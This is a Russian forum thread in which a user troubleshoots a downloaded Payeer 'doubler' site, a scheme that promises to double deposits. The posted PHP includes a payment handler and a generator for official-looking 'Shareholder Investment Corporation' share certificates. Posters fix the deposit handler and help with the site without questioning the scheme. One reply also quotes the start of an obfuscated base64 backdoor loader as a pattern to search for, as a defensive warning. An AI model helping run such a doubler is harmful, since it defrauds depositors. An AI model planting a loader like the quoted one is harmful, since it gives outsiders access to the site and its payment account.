РЕШЕНО Payeer удвоитель. Не зачисляется депозит на удвоителе.

Статус
В этой теме нельзя размещать новые ответы.

Roktor

Участник
Сообщения
21
Реакции
3
PSC
0,00
Здравствуйте. Столкнулся с проблемой, прошу помощи. Я скачал Payeer удвоитель (С открытого доступа) и все настроил. Вроде все правильно. Заказал Мерчант (Уже одобрили) и настроил автовыплаты. Проблема такова: При внесении депозита на удвоитель средства с Payeer кошелька списываются, в истории Payeer все написано как надо, откуда списалось и куда пришло. Но на самом удвоителе мои депозиты не добавляются, не показываются. В базе данных, deposits тоже не заносятся. Помогите пожалуйста
 
Последнее редактирование:

jameson

Местный
Сообщения
620
Реакции
359
PSC
-61,26
Чтобы Вам помочь нужно знать что за удвоитель и вообще хотя бы иметь представление о том что Вы скачали, удвоитель - удвоителю рознь, но проблема с 99% вероятности в обработчике платежа, который не принимает платеж или возможно неправильно дешифрует полученные данные.
 

jameson

Местный
Сообщения
620
Реакции
359
PSC
-61,26
PHP:
<?php
define('SCRIPT_BY_SIRGOFFAN',dirname(__FILE__));
require_once('classes/safemysql.php');
require_once('config.php');

$cmnt="none";

$sum=$_POST['m_amount']; //Сумма, поступившая от клиента
$id=$_POST['m_orderid'];


if (isset($_POST['m_operation_id']) && isset($_POST['m_sign']))
{
    $arHash = array($_POST['m_operation_id'],
            $_POST['m_operation_ps'],
            $_POST['m_operation_date'],
            $_POST['m_operation_pay_date'],
            $_POST['m_shop'],
            $_POST['m_orderid'],
            $_POST['m_amount'],
            $_POST['m_curr'],
            $_POST['m_desc'],
            $_POST['m_status'],
            'КЛЮЧ'); // НЕ ПРОПИСАН КЛЮЧ
    $sign_hash = strtoupper(hash('sha256', implode(':', $arHash)));
if ($_POST['m_sign'] == $sign_hash && $_POST['m_status'] == 'success')
{
   


$referer=$db->getOne("SELECT curator FROM `ss_users` WHERE id=?i", $id);
$db->query("INSERT INTO deposits (userid, curatorid, summa, unixtime) VALUES(?i,?i,?s,?s)", $id, $referer, $sum, time());
echo $_POST['m_orderid'].'|success';
exit;
}
echo $_POST['m_orderid'].'|error';

}
?>
Не прописан ключ в 24-й строке
 

Leroi

Местный
Сообщения
210
Реакции
92
PSC
1.382,69
нашел откуда скачивать ,проверь на дыры ,на соцеоле все дырявое
 

Roktor

Участник
Сообщения
21
Реакции
3
PSC
0,00
PHP:
<?php
define('SCRIPT_BY_SIRGOFFAN',dirname(__FILE__));
require_once('classes/safemysql.php');
require_once('config.php');

$cmnt="none";

$sum=$_POST['m_amount']; //Сумма, поступившая от клиента
$id=$_POST['m_orderid'];


if (isset($_POST['m_operation_id']) && isset($_POST['m_sign']))
{
    $arHash = array($_POST['m_operation_id'],
            $_POST['m_operation_ps'],
            $_POST['m_operation_date'],
            $_POST['m_operation_pay_date'],
            $_POST['m_shop'],
            $_POST['m_orderid'],
            $_POST['m_amount'],
            $_POST['m_curr'],
            $_POST['m_desc'],
            $_POST['m_status'],
            'КЛЮЧ'); // НЕ ПРОПИСАН КЛЮЧ
    $sign_hash = strtoupper(hash('sha256', implode(':', $arHash)));
if ($_POST['m_sign'] == $sign_hash && $_POST['m_status'] == 'success')
{
  


$referer=$db->getOne("SELECT curator FROM `ss_users` WHERE id=?i", $id);
$db->query("INSERT INTO deposits (userid, curatorid, summa, unixtime) VALUES(?i,?i,?s,?s)", $id, $referer, $sum, time());
echo $_POST['m_orderid'].'|success';
exit;
}
echo $_POST['m_orderid'].'|error';

}
?>
Не прописан ключ в 24-й строке
Ты просто красавчик мужик. Теперь вставил ключ от магазина и работает. Спасибо тебе огромное. Как же хорошо, что есть люди, которые готовы помогать нуждающимся)
 

jameson

Местный
Сообщения
620
Реакции
359
PSC
-61,26
А это можно делать автоматически? Или только руками проверять ошибки? Я просто новичок в этом деле.
Сейчас проверю, но поверхностно, программой, в каждый файл нет времени залезть.
 

jameson

Местный
Сообщения
620
Реакции
359
PSC
-61,26
Есть вредонос, удаляй срочно файл: /site/img/index.php благодаря этому файлу, тот кто выложил скрипт может получить доступ к сайту и как вариант вывести все с твоего payeer счета.
 

Roktor

Участник
Сообщения
21
Реакции
3
PSC
0,00
Есть вредонос, удаляй срочно файл: /site/img/index.php благодаря этому файлу, тот кто выложил скрипт может получить доступ к сайту и как вариант вывести все с твоего payeer счета.
У меня в папке img нету index.php (Возможно я его уже удалял). Но этот файл есть в корне, в publick_html
Там вот такой код прописан,
<?session_start();
define('SCRIPT_BY_SIRGOFFAN',dirname(__FILE__));
include(dirname(__FILE__).'/core/ini.php');
include(dirname(__FILE__).'/core/cache.php');

$page = $_GET['page'];

include('templ/main/head.php');



if(isset($page)){
if(file_exists(dirname(__FILE__)."/pages/".$page.".php")){
include(dirname(__FILE__)."/pages/".$page.'.php');
}else{
include(dirname(__FILE__).'/pages/404.php');
}
}else{
include(dirname(__FILE__).'/pages/main.php');


}
Его удалять?

По этому пути у меня есть только один файл php - printshare.php

<?php
// Тип содержимого – картинка формата PNG
define( 'SCRIPT_BY_SIRGOFFAN', 1 );
include('../core/config.php');
include('../core/functions.php');
$lng=$_GET['locale'];//Язык
if($lng!='ru' AND $lng!='en' AND $lng!='nl' ){$_error='FATAL ERROR 1';}

$a=$_GET['a'];//Тип акции
if($a==1){$typeofshare="m1";}else
if($a==2){$typeofshare="m2";}else
if($a==3){$typeofshare="i1";}else
if($a==4){$typeofshare="i2";}else
if($a==5){$typeofshare="i3";}else{$_error='FATAL ERROR 2';}



$refcode=(int)$_GET['refcode'];//(N сертификата)
if($refcode<1){$_error='FATAL ERROR 3';}
$result=mysql_query("SELECT id, act_".$typeofshare.", reg_unix FROM `ss_users` WHERE refcode='$refcode'");
$rowe=mysql_fetch_array($result);
$userid=$rowe["id"]; //
$reg_unix=$rowe["reg_unix"]; //

if($userid<1){$_error='FATAL ERROR 4';}

$isact=(int)$rowe["act_".$typeofshare];

if($isact<1){/*$_error='FATAL ERROR 5';*/}else{

$result2=mysql_query("SELECT * FROM `userstat` WHERE userid='$userid' AND comment='$typeofshare' AND opisanie LIKE '<!--buyshare-->%' ORDER BY id DESC LIMIT 1");
$row=mysql_fetch_array($result2);
$data=strtotime($row["data"]); //
$data=date("d.m.Y",$data);
$dataX=$row["data"]; //
$ssid=$row["id"];
//if($ssid<1){$_error='FATAL ERROR 6';}

if(empty($dataX)){
$reg_unix=strtotime($reg_unix); //
$data=date("d.m.Y",$reg_unix);
}

}




function imageresizeS($im,$percents) {
$w=imagesx($im)*$percents/100;
$h=imagesy($im)*$percents/100;
$im1=imagecreatetruecolor($w,$h);
imagecopyresampled($im1,$im,0,0,0,0,$w,$h,imagesx($im),imagesy($im));

imagedestroy($im);
//imagedestroy($im1);
return $im1;
}






if(isset($_GET['previewpercent']) AND $_GET['previewpercent']>1 AND $_GET['previewpercent']<100){
$previewpercent=(int)$_GET['previewpercent'];
if($previewpercent<1){$previewpercent=100;}
}else{
$previewpercent=100;
}




if(empty($_error)){
$source_img='shares/'.$lng.'/'.$typeofshare.'.jpg';
$img = imageCreateFromJpeg($source_img);


// получаем массив, содержащий размеры изображения
$size = getimagesize ($source_img);
$CENTER=$size[0]/2;







if($typeofshare=='m1'){
$color = imagecolorallocatealpha($img, 0, 0, 0, 0);

if($isact!=0){
$box = imagettftext($img, 22, 0, 148, 172, $color, "./shares.ttf", $refcode);//160 172
$box = imagettftext($img, 22, 0, 762, 172, $color, "./shares.ttf", $data);
$costtxt=printlng("$".($isact*$sh['cost_m'][1]),"$".($isact*$sh['cost_m'][1]),($isact*$sh['cost_m'][1])." $","","","",$lng);
$box = imagettfbbox(88, 0, "./CollegeHalo.ttf", $costtxt);
// размер отступа влево, чтобы текст оказался посередине заданной точки
$left = $CENTER-round(($box[2]-$box[0])/2);
imagettftext($img, 88, 0, $left, 330, $color, "./CollegeHalo.ttf", $costtxt);
}



$desctxt=printlng("Shareholder Investment Corporation
Dit certificaat, met de nominale waarde van $".($isact*$sh['cost_m'][1])." is het eigendom van Shareholder
Investment Corporation, inclusief, en wordt betaald door de eigenaar volledig.
Dit aandeel wordt niet belast en voldoet aan de oprichters-overeenkomst en het corporatie reglement.","Shareholder Investment Corporation
This certificate, with the face value of $".($isact*$sh['cost_m'][1])." is the property of Shareholder Investment
Corporation, inclusive, and is paid for by its owner in full. This share is not taxed and
conforms to the Foundation Agreement and the Corporation’s By-Laws.","Shareholder Investment Corporation
Этот сертификат, стоимостью ".($isact*$sh['cost_m'][1])." $ является собственностью Shareholder
Investment Corporation, включительно и полностью оплачен владельцем.
Данная акция не облагается налогом, соответствует Учредительскому
Договору и Уставу Корпорации.","","","",$lng);
imagettftext($img, 20, 0, 100, 370, $color, "./share_d.ttf", $desctxt);

}else
if($typeofshare=='m2'){
///////
$color = imagecolorallocatealpha($img, 0, 0, 0, 0);



if($isact!=0){
$box = imagettftext($img, 22, 0, 149, 172, $color, "./shares.ttf", $refcode);
$box = imagettftext($img, 22, 0, 760, 172, $color, "./shares.ttf", $data);
$costtxt=printlng("$".($isact*$sh['cost_m'][2]),"$".($isact*$sh['cost_m'][2]),($isact*$sh['cost_m'][2])." $","","","",$lng);
$box = imagettfbbox(91, 0, "./CollegeHalo.ttf", $costtxt);
// размер отступа влево, чтобы текст оказался посередине заданной точки
$left = $CENTER-round(($box[2]-$box[0])/2);
imagettftext($img, 91, 0, $left, 300, $color, "./CollegeHalo.ttf", $costtxt);
}



$desctxt=printlng("Shareholder Investment Corporation
Dit certificaat, met de nominale waarde van $".($isact*$sh['cost_m'][2])." is het eigendom van Shareholder
Investment Corporation, inclusief, en wordt betaald door de eigenaar volledig.
Dit aandeel wordt niet belast en voldoet aan de oprichters-overeenkomst en het corporatie reglement.","Shareholder Investment Corporation
This certificate, with the face value of $".($isact*$sh['cost_m'][2])." is the property of Shareholder Investment
Corporation, inclusive, and is paid for by its owner in full. This share is not taxed and
conforms to the Foundation Agreement and the Corporation’s By-Laws.","Shareholder Investment Corporation
Этот сертификат, стоимостью ".($isact*$sh['cost_m'][2])." $ является собственностью Shareholder
Investment Corporation, включительно и полностью оплачен владельцем.
Данная акция не облагается налогом, соответствует Учредительскому
Договору и Уставу Корпорации.","","","",$lng);
imagettftext($img, 20, 0, 100, 370, $color, "./share_d.ttf", $desctxt);

}else
if($typeofshare=='i1'){
$color = imagecolorallocatealpha($img, 0, 0, 0, 0);



if($isact!=0){
$box = imagettftext($img, 22, 0, 119, 171, $color, "./shares.ttf", $refcode);
$box = imagettftext($img, 22, 0, 784, 171, $color, "./shares.ttf", $data);
$costtxt=printlng("$".($isact*$sh['cost_i'][1]),"$".($isact*$sh['cost_i'][1]),($isact*$sh['cost_i'][1])." $","","","",$lng);
$box = imagettfbbox(91, 0, "./CollegeHalo.ttf", $costtxt);
// размер отступа влево, чтобы текст оказался посередине заданной точки
$left = $CENTER-round(($box[2]-$box[0])/2);
imagettftext($img, 91, 0, $left, 320, $color, "./CollegeHalo.ttf", $costtxt);
}




$desctxt=printlng("Shareholder Investment Corporation
Dit certificaat, met de nominale waarde van $".($isact*$sh['cost_i'][1])." is het eigendom van Shareholder
Investment Corporation, inclusief, en wordt betaald door de eigenaar volledig.
Dit aandeel wordt niet belast en voldoet aan de oprichters-overeenkomst en het corporatie reglement.","Shareholder Investment Corporation
This certificate, with the face value of $".($isact*$sh['cost_i'][1])." is the property of Shareholder Investment
Corporation, inclusive, and is paid for by its owner in full. This share is not taxed and
conforms to the Foundation Agreement and the Corporation’s By-Laws.","Shareholder Investment Corporation
Этот сертификат, стоимостью ".($isact*$sh['cost_i'][1])." $ является собственностью Shareholder
Investment Corporation, включительно и полностью оплачен владельцем.
Данная акция не облагается налогом, соответствует Учредительскому
Договору и Уставу Корпорации.","","","",$lng);
imagettftext($img, 20, 0, 100, 370, $color, "./share_d.ttf", $desctxt);


}else
if($typeofshare=='i2'){
$color = imagecolorallocatealpha($img, 0, 0, 0, 0);



if($isact!=0){
$box = imagettftext($img, 22, 0, 179, 212, $color, "./shares.ttf", $refcode);
$box = imagettftext($img, 22, 0, 763, 212, $color, "./shares.ttf", $data);
$costtxt=printlng("$".($isact*$sh['cost_i'][2]),"$".($isact*$sh['cost_i'][2]),($isact*$sh['cost_i'][2])." $","","","",$lng);
$box = imagettfbbox(80, 0, "./CollegeHalo.ttf", $costtxt);
// размер отступа влево, чтобы текст оказался посередине заданной точки
$left = $CENTER-round(($box[2]-$box[0])/2);
imagettftext($img, 80, 0, $left, 333, $color, "./CollegeHalo.ttf", $costtxt);
}

$desctxt=printlng("Shareholder Investment Corporation
Dit certificaat, met de nominale waarde van $".($isact*$sh['cost_i'][2])." is het eigendom van Shareholder
Investment Corporation, inclusief, en wordt betaald door de eigenaar volledig.
Dit aandeel wordt niet belast en voldoet aan de oprichters-overeenkomst en het corporatie reglement.","Shareholder Investment Corporation
This certificate, with the face value of $".($isact*$sh['cost_i'][2])." is the property of Shareholder Investment
Corporation, inclusive, and is paid for by its owner in full. This share is not taxed and
conforms to the Foundation Agreement and the Corporation’s By-Laws.","Shareholder Investment Corporation
Этот сертификат, стоимостью ".($isact*$sh['cost_i'][2])." $ является собственностью Shareholder
Investment Corporation, включительно и полностью оплачен владельцем.
Данная акция не облагается налогом, соответствует Учредительскому
Договору и Уставу Корпорации.","","","",$lng);
imagettftext($img, 20, 0, 100, 380, $color, "./share_d.ttf", $desctxt);

}else
if($typeofshare=='i3'){
$color = imagecolorallocatealpha($img, 0, 0, 0, 0);



if($isact!=0){
$box = imagettftext($img, 22, 0, 194, 228, $color, "./shares.ttf", $refcode);
$box = imagettftext($img, 22, 0, 792, 228, $color, "./shares.ttf", $data);
$costtxt=printlng("$".($isact*$sh['cost_i'][3]),"$".($isact*$sh['cost_i'][3]),($isact*$sh['cost_i'][3])." $","","","",$lng);
$box = imagettfbbox(80, 0, "./CollegeHalo.ttf", $costtxt);
// размер отступа влево, чтобы текст оказался посередине заданной точки
$left = $CENTER-round(($box[2]-$box[0])/2);
imagettftext($img, 80, 0, $left, 350, $color, "./CollegeHalo.ttf", $costtxt);
}



$desctxt=printlng("Shareholder Investment Corporation
Dit certificaat, met de nominale waarde van $".($isact*$sh['cost_i'][3])." is het eigendom van Shareholder
Investment Corporation, inclusief, en wordt betaald door de eigenaar volledig.
Dit aandeel wordt niet belast en voldoet aan de oprichters-overeenkomst en het corporatie reglement.","Shareholder Investment Corporation
This certificate, with the face value of $".($isact*$sh['cost_i'][3])." is the property of Shareholder Investment
Corporation, inclusive, and is paid for by its owner in full. This share is not taxed and
conforms to the Foundation Agreement and the Corporation’s By-Laws.","Shareholder Investment Corporation
Этот сертификат, стоимостью ".($isact*$sh['cost_i'][3])." $ является собственностью Shareholder
Investment Corporation, включительно и полностью оплачен владельцем.
Данная акция не облагается налогом, соответствует Учредительскому
Договору и Уставу Корпорации.","","","",$lng);
imagettftext($img, 20, 0, 100, 400, $color, "./share_d.ttf", $desctxt);


}
}else{
/*if($userid==21)
echo $_error;
exit();
*/
$img = imageCreateFromJpeg('shares_null/'.$lng.'/'.$typeofshare.'.jpg');

}



if(isset($_GET['previewpercent'])){
$img = imageresizeS($img,$previewpercent);
}










header("Content-type: image/png");

// выводим готовую картинку в формате PNG
imagepng($img);
// освобождаем память, выделенную для картинки
imagedestroy($img);
exit();


?>
 
Последнее редактирование:

Viktor

Участник
Сообщения
736
Реакции
114
PSC
624,27
У меня в папке img нету index.php (Возможно я его уже удалял). Но этот файл есть в корне, в publick_html
Там вот такой код прописан,
<?session_start();
define('SCRIPT_BY_SIRGOFFAN',dirname(__FILE__));
include(dirname(__FILE__).'/core/ini.php');
include(dirname(__FILE__).'/core/cache.php');

$page = $_GET['page'];

include('templ/main/head.php');



if(isset($page)){
if(file_exists(dirname(__FILE__)."/pages/".$page.".php")){
include(dirname(__FILE__)."/pages/".$page.'.php');
}else{
include(dirname(__FILE__).'/pages/404.php');
}
}else{
include(dirname(__FILE__).'/pages/main.php');


}
Его удалять?
Если ты в корне index удалишь, то не будет сайт работать.
 

Viktor

Участник
Сообщения
736
Реакции
114
PSC
624,27
Возможно и нет. Обычно в таком файле всё закодировано, проверь другие папки на наличие лишних файлов.
 

Viktor

Участник
Сообщения
736
Реакции
114
PSC
624,27
Вот типа такого кода ищи:
Код:
<?php $wp__wp='base'.(128/2).'_de'.'code';$wp__wp=$wp__wp(str_replace("\n", '', 'ObBykUDsCh2PiKsj5cqfSDyA8xI8bIrawFHOQbc16qiD+/3Wnoko/OoyWI4NB7fPtkccJR/VNFrQ//up
и так далее.
 

Roktor

Участник
Сообщения
21
Реакции
3
PSC
0,00
Вот типа такого кода ищи:
Код:
<?php $wp__wp='base'.(128/2).'_de'.'code';$wp__wp=$wp__wp(str_replace("\n", '', 'ObBykUDsCh2PiKsj5cqfSDyA8xI8bIrawFHOQbc16qiD+/3Wnoko/OoyWI4NB7fPtkccJR/VNFrQ//up
и так далее.
Прошелся по всем папкам и файлам. Ничего подобного не увидел. Не подскажите, через какую программу можно проверять скрипты на дыры?
 

Viktor

Участник
Сообщения
736
Реакции
114
PSC
624,27
обычно в ручную всё проверяется, программы не покажут 100% результат.
 

jameson

Местный
Сообщения
620
Реакции
359
PSC
-61,26
Понял, спасибо. Получается у меня нету того файла, про который выше говорится
По ссылке, что ты выше давал на скачивание он есть и вот он в аттаче, смотри, точно его нет или же тот кто его разместил уже имеет доуступ к серверу и стер его, либо добавил вредоносный код в другой файл.

Зараженный файл прикрепил к ответу, ищи примерный код
 

Вложения

Roktor

Участник
Сообщения
21
Реакции
3
PSC
0,00
По ссылке, что ты выше давал на скачивание он есть и вот он в аттаче, смотри, точно его нет или же тот кто его разместил уже имеет доуступ к серверу и стер его, либо добавил вредоносный код в другой файл.

Зараженный файл прикрепил к ответу, ищи примерный код
Облазил везде, нигде не заметил. Но код знакомый, я его видел. Может я его и удалил... У меня другой вопрос возник. Я хочу разместить банеры на своем удвоителе. Но не могу это сделать корректно. http://2xlive.ru вот мой удвоитель. Я пытаюсь вставить внизу по бокам банеры, не получается, они вставляются внутрь белого фона, а не по бокам. Можете что-нибудь подсказать?
 

jameson

Местный
Сообщения
620
Реакции
359
PSC
-61,26
Так это надо смотреть стили и код страницы, я не могу знать как ты сайт свой размечал, таблицами, дивами или еще как-то, как вариант есть универсальное решение правда не самое неудачное, ибо ему уже лет 20, этому решению, но под стиль твоего сайта подойдет и даже не испортит его:
HTML:
<table width="100%">
    <tr>
    <td width="25%">КОД_БАННЕРА_1</td>
    </tr>
    <tr>
    <td width="25%">КОД_БАННЕРА_2</td>
    </tr>
    <tr>
    <td width="25%">КОД_БАННЕРА_3</td>
    </tr>
    <tr>
    <td width="25%">КОД_БАННЕРА_4</td>
    </tr>
</table>
что-то типа того, нужно вставить в самый низ перед футером.
 

Roktor

Участник
Сообщения
21
Реакции
3
PSC
0,00
Так это надо смотреть стили и код страницы, я не могу знать как ты сайт свой размечал, таблицами, дивами или еще как-то, как вариант есть универсальное решение правда не самое неудачное, ибо ему уже лет 20, этому решению, но под стиль твоего сайта подойдет и даже не испортит его:
HTML:
<table width="100%">
    <tr>
    <td width="25%">КОД_БАННЕРА_1</td>
    </tr>
    <tr>
    <td width="25%">КОД_БАННЕРА_2</td>
    </tr>
    <tr>
    <td width="25%">КОД_БАННЕРА_3</td>
    </tr>
    <tr>
    <td width="25%">КОД_БАННЕРА_4</td>
    </tr>
</table>
что-то типа того, нужно вставить в самый низ перед футером.
Спасибо большое, куда-то в общем вставил) Но стало получше, благодарю)
 
Статус
В этой теме нельзя размещать новые ответы.
Сверху